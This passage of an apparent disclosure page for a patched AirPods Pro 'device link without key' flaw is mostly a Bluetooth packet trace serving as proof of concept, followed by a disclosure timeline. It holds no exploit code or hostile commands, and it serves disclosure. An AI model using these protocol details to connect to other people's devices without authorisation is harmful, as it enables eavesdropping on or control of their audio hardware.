            Maximum Bitpool: 53
        Service Category: Delay Reporting (0x08)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9565 [hci0] 09:30:07.792113
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9566 [hci0] 09:30:07.793003
      L2CAP: Configure Response (0x05) ident 9 len 10
        Source CID: 94
        Flags: 0x0000
        Result: Success (0x0000)
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9567 [hci0] 09:30:07.793110
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 16                                                                             #9568 [hci0] 09:30:07.795003
      L2CAP: Configure Request (0x04) ident 15 len 8
        Destination CID: 94
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 256
> ACL Data RX: Handle 256 flags 0x02 dlen 22                                                                             #9569 [hci0] 09:30:07.795003
      Channel: 93 len 18 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Command: type 0x00 label 1 PID 0x110e
        AV/C: Notify: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: RegisterNotification pt Single len 0x0005
            EventID: 0x01 (EVENT_PLAYBACK_STATUS_CHANGED)
            Interval: 0x00000000 (0 seconds)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9570 [hci0] 09:30:07.795111
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9571 [hci0] 09:30:07.795344
      L2CAP: Configure Response (0x05) ident 15 len 6
        Source CID: 1288
        Flags: 0x0000
        Result: Success (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 28                                                                             #9572 [hci0] 09:30:07.795371
      Channel: 1288 len 24 [PSM 1 mode Basic (0x00)] {chan 4}
      SDP: Service Search Attribute Request (0x06) tid 0 len 19
        Search pattern: [len 5]
          Sequence (6) with 3 bytes [8 extra bits] len 5
            UUID (3) with 2 bytes [0 extra bits] len 3
              A/V Remote Control (0x110e)
        Max record count: 1008
        Attribute list: [len 11]
          Sequence (6) with 9 bytes [8 extra bits] len 11
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0001
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0009
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0311
        Continuation state: 0
< ACL Data TX: Handle 256 flags 0x00 dlen 19                                                                             #9573 [hci0] 09:30:07.795374
      Channel: 1031 len 15 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Response: type 0x00 label 1 PID 0x110e
        AV/C: Interim: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: RegisterNotification pt Single len 0x0002
            EventID: 0x01 (EVENT_PLAYBACK_STATUS_CHANGED)
            PlayStatus: 0x02 (PAUSED)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9574 [hci0] 09:30:07.799114
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 9                                                                              #9575 [hci0] 09:30:07.800002
      Channel: 91 len 5 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x1b cr 1 dlci 0x06
         Control: 0xff poll/final 1
         Length: 0
         FCS: 0x93
         Credits: 255
        93                                               .               
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9576 [hci0] 09:30:07.800002
      Channel: 91 len 8 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x03 cr 1 dlci 0x00
         Control: 0xef poll/final 0
         Length: 4
         FCS: 0x70
         MCC Message type: Modem Status Command RSP (0x38)
           Length: 2
           dlci 6 
           fc 0 rtc 1 rtr 1 ic 0 dv 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9577 [hci0] 09:30:07.800114
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9578 [hci0] 09:30:07.801115
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9579 [hci0] 09:30:07.808002
      L2CAP: Connection Request (0x02) ident 16 len 4
        PSM: 1 (0x0001)
        Source CID: 1540
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9580 [hci0] 09:30:07.808397
      L2CAP: Connection Response (0x03) ident 16 len 8
        Destination CID: 95
        Source CID: 1540
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9581 [hci0] 09:30:07.808425
      L2CAP: Configure Request (0x04) ident 10 len 8
        Destination CID: 1540
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
> ACL Data RX: Handle 256 flags 0x02 dlen 20                                                                             #9582 [hci0] 09:30:07.810004
      Channel: 92 len 16 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Set Configuration (0x03) Command (0x00) type 0x00 label 3 nosp 0
        ACP SEID: 1
        INT SEID: 1
        Service Category: Media Transport (0x01)
        Service Category: Media Codec (0x07)
          Media Type: Audio (0x00)
          Media Codec: SBC (0x00)
            Frequency: 44100 (0x20)
            Channel Mode: Joint Stereo (0x01)
            Block Length: 16 (0x10)
            Subbands: 8 (0x04)
            Allocation Method: Loudness (0x01)
            Minimum Bitpool: 2
            Maximum Bitpool: 53
        Service Category: Delay Reporting (0x08)
< ACL Data TX: Handle 256 flags 0x00 dlen 6                                                                              #9583 [hci0] 09:30:07.810423
      Channel: 774 len 2 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Set Configuration (0x03) Response Accept (0x02) type 0x00 label 3 nosp 0
< ACL Data TX: Handle 256 flags 0x00 dlen 7                                                                              #9584 [hci0] 09:30:07.810452
      Channel: 774 len 3 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Get All Capabilities (0x0c) Command (0x00) type 0x00 label 0 nosp 0
        ACP SEID: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 75                                                                             #9585 [hci0] 09:30:07.815002
      Channel: 94 len 71 [PSM 1 mode Basic (0x00)] {chan 4}
      SDP: Service Search Attribute Response (0x07) tid 0 len 66
        Attribute bytes: 63
          Attribute list: [len 27] {position 0}
            Attribute: Service Class ID List (0x0001) [len 2]
              UUID (3) with 2 bytes [0 extra bits] len 3
                A/V Remote Control Target (0x110c)
            Attribute: Bluetooth Profile Descriptor List (0x0009) [len 2]
              Sequence (6) with 6 bytes [8 extra bits] len 8
                UUID (3) with 2 bytes [0 extra bits] len 3
                  A/V Remote Control (0x110e)
                Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
                  0x0105
            Attribute: Unknown (0x0311) [len 2]
              0x0002
          Attribute list: [len 30] {position 1}
            Attribute: Service Class ID List (0x0001) [len 2]
              UUID (3) with 2 bytes [0 extra bits] len 3
                A/V Remote Control (0x110e)
              UUID (3) with 2 bytes [0 extra bits] len 3
                A/V Remote Control Controller (0x110f)
            Attribute: Bluetooth Profile Descriptor List (0x0009) [len 2]
              Sequence (6) with 6 bytes [8 extra bits] len 8
                UUID (3) with 2 bytes [0 extra bits] len 3
                  A/V Remote Control (0x110e)
                Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
                  0x0105
            Attribute: Unknown (0x0311) [len 2]
              0x0001
        Continuation state: 0
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9586 [hci0] 09:30:07.815121
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 28                                                                             #9587 [hci0] 09:30:07.815335
      Channel: 1288 len 24 [PSM 1 mode Basic (0x00)] {chan 4}
      SDP: Service Search Attribute Request (0x06) tid 0 len 19
        Search pattern: [len 5]
          Sequence (6) with 3 bytes [8 extra bits] len 5
            UUID (3) with 2 bytes [0 extra bits] len 3
              Handsfree (0x111e)
        Max record count: 1008
        Attribute list: [len 11]
          Sequence (6) with 9 bytes [8 extra bits] len 11
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0001
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0009
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0311
        Continuation state: 0
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9588 [hci0] 09:30:07.816117
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 22                                                                             #9589 [hci0] 09:30:07.816522
      Channel: 1031 len 18 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Command: type 0x00 label 0 PID 0x110e
        AV/C: Notify: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: RegisterNotification pt Single len 0x0005
            EventID: 0x0d (EVENT_VOLUME_CHANGED)
            Interval: 0x00000000 (0 seconds)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9590 [hci0] 09:30:07.817122
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9591 [hci0] 09:30:07.818123
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 16                                                                             #9592 [hci0] 09:30:07.820002
      L2CAP: Configure Request (0x04) ident 17 len 8
        Destination CID: 95
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 128
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9593 [hci0] 09:30:07.820003
      L2CAP: Configure Response (0x05) ident 10 len 10
        Source CID: 95
        Flags: 0x0000
        Result: Success (0x0000)
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9594 [hci0] 09:30:07.820124
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9595 [hci0] 09:30:07.820320
      L2CAP: Configure Response (0x05) ident 17 len 6
        Source CID: 1540
        Flags: 0x0000
        Result: Success (0x0000)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9596 [hci0] 09:30:07.821125
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9597 [hci0] 09:30:07.824126
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 9                                                                              #9598 [hci0] 09:30:07.828002
      Channel: 92 len 5 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Delay Report (0x0d) Command (0x00) type 0x00 label 4 nosp 0
        ACP SEID: 1
        Delay: 150.0ms
< ACL Data TX: Handle 256 flags 0x00 dlen 6                                                                              #9599 [hci0] 09:30:07.828390
      Channel: 774 len 2 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Delay Report (0x0d) Response Accept (0x02) type 0x00 label 4 nosp 0
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9600 [hci0] 09:30:07.830003
      Channel: 92 len 14 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Get All Capabilities (0x0c) Response Accept (0x02) type 0x00 label 0 nosp 0
        Service Category: Media Transport (0x01)
        Service Category: Media Codec (0x07)
          Media Type: Audio (0x00)
          Media Codec: SBC (0x00)
            Frequency: 0x30
              44100
              48000
            Channel Mode: 0x0f
              Mono
              Dual Channel
              Stereo
              Joint Stereo
            Block Length: 0xf0
              4
              8
              12
              16
            Subbands: 0x0c
              4
              8
            Allocation Method: 0x03
              SNR
              Loudness
            Minimum Bitpool: 2
            Maximum Bitpool: 53
        Service Category: Delay Reporting (0x08)
> ACL Data RX: Handle 256 flags 0x02 dlen 19                                                                             #9601 [hci0] 09:30:07.830004
      Channel: 93 len 15 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Response: type 0x00 label 0 PID 0x110e
        AV/C: Interim: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: RegisterNotification pt Single len 0x0002
            EventID: 0x0d (EVENT_VOLUME_CHANGED)
            Volume: 52.76% (67/127)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9602 [hci0] 09:30:07.832133
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 46                                                                             #9603 [hci0] 09:30:07.834030
      Channel: 94 len 42 [PSM 1 mode Basic (0x00)] {chan 4}
      SDP: Service Search Attribute Response (0x07) tid 0 len 37
        Attribute bytes: 34
          Attribute list: [len 30] {position 0}
            Attribute: Service Class ID List (0x0001) [len 2]
              UUID (3) with 2 bytes [0 extra bits] len 3
                Handsfree (0x111e)
              UUID (3) with 2 bytes [0 extra bits] len 3
                Generic Audio (0x1203)
            Attribute: Bluetooth Profile Descriptor List (0x0009) [len 2]
              Sequence (6) with 6 bytes [8 extra bits] len 8
                UUID (3) with 2 bytes [0 extra bits] len 3
                  Handsfree (0x111e)
                Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
                  0x0106
            Attribute: Unknown (0x0311) [len 2]
              0x003b
        Continuation state: 0
> ACL Data RX: Handle 256 flags 0x02 dlen 22                                                                             #9604 [hci0] 09:30:07.834036
      Channel: 95 len 18 [PSM 1 mode Basic (0x00)] {chan 0}
      SDP: Service Search Attribute Request (0x06) tid 1 len 13
        Search pattern: [len 5]
          Sequence (6) with 3 bytes [8 extra bits] len 5
            UUID (3) with 2 bytes [0 extra bits] len 3
              Handsfree Audio Gateway (0x111f)
        Max record count: 64
        Attribute list: [len 5]
          Sequence (6) with 3 bytes [8 extra bits] len 5
            Unsigned Integer (1) with 2 bytes [0 extra bits] len 3
              0x0311
        Continuation state: 0
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9605 [hci0] 09:30:07.834291
      L2CAP: Disconnection Request (0x06) ident 11 len 4
        Destination CID: 1288
        Source CID: 94
< ACL Data TX: Handle 256 flags 0x00 dlen 23                                                                             #9606 [hci0] 09:30:07.834324
      Channel: 1540 len 19 [PSM 1 mode Basic (0x00)] {chan 0}
      SDP: Service Search Attribute Response (0x07) tid 1 len 14
        Attribute bytes: 11
          Attribute list: [len 6] {position 0}
            Attribute: Unknown (0x0311) [len 2]
              0x0020
        Continuation state: 0
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9607 [hci0] 09:30:07.837137
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 7                                                                              #9608 [hci0] 09:30:07.838014
      Channel: 92 len 3 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Open (0x06) Command (0x00) type 0x00 label 5 nosp 0
        ACP SEID: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 6                                                                              #9609 [hci0] 09:30:07.838272
      Channel: 774 len 2 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Open (0x06) Response Accept (0x02) type 0x00 label 5 nosp 0
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9610 [hci0] 09:30:07.839139
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9611 [hci0] 09:30:07.842046
      L2CAP: Disconnection Response (0x07) ident 11 len 4
        Destination CID: 1288
        Source CID: 94
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9612 [hci0] 09:30:07.842139
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9613 [hci0] 09:30:07.844005
      L2CAP: Disconnection Request (0x06) ident 18 len 4
        Destination CID: 95
        Source CID: 1540
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9614 [hci0] 09:30:07.844271
      L2CAP: Disconnection Response (0x07) ident 18 len 4
        Destination CID: 95
        Source CID: 1540
> ACL Data RX: Handle 256 flags 0x02 dlen 20                                                                             #9615 [hci0] 09:30:07.847004
      Channel: 91 len 16 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x1b cr 1 dlci 0x06
         Control: 0xef poll/final 0
         Length: 12
         FCS: 0x8f
        41 54 2b 42 52 53 46 3d 36 36 37 0d 8f           AT+BRSF=667..   
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9616 [hci0] 09:30:07.847046
      L2CAP: Connection Request (0x02) ident 19 len 4
        PSM: 25 (0x0019)
        Source CID: 1800
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9617 [hci0] 09:30:07.847143
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9618 [hci0] 09:30:07.847288
      L2CAP: Connection Response (0x03) ident 19 len 8
        Destination CID: 96
        Source CID: 1800
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9619 [hci0] 09:30:07.847319
      L2CAP: Configure Request (0x04) ident 12 len 8
        Destination CID: 1800
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
< ACL Data TX: Handle 256 flags 0x00 dlen 23                                                                             #9620 [hci0] 09:30:07.847327
      Channel: 517 len 19 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x19 cr 0 dlci 0x06
         Control: 0xff poll/final 1
         Length: 14
         FCS: 0x49
         Credits: 4
        0d 0a 2b 42 52 53 46 3a 20 35 37 36 0d 0a 49     ..+BRSF: 576..I 
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9621 [hci0] 09:30:07.847331
      Channel: 517 len 10 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x19 cr 0 dlci 0x06
         Control: 0xef poll/final 0
         Length: 6
         FCS: 0x55
        0d 0a 4f 4b 0d 0a 55                             ..OK..U         
> HCI Event: Number of Completed Packets (0x13) plen 5

Additional Information

https://support.apple.com/HT213752

Timeline

Date reported: 02/15/2023
Date fixed: 05/03/2023
Date disclosed: 06/15/2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Apple: Airpods Pro Device Link without Key

Package

Affected versions

Patched versions

Description

Summary

Severity

Proof of Concept

Additional Information

Timeline

Severity

CVE ID

Weaknesses

Credits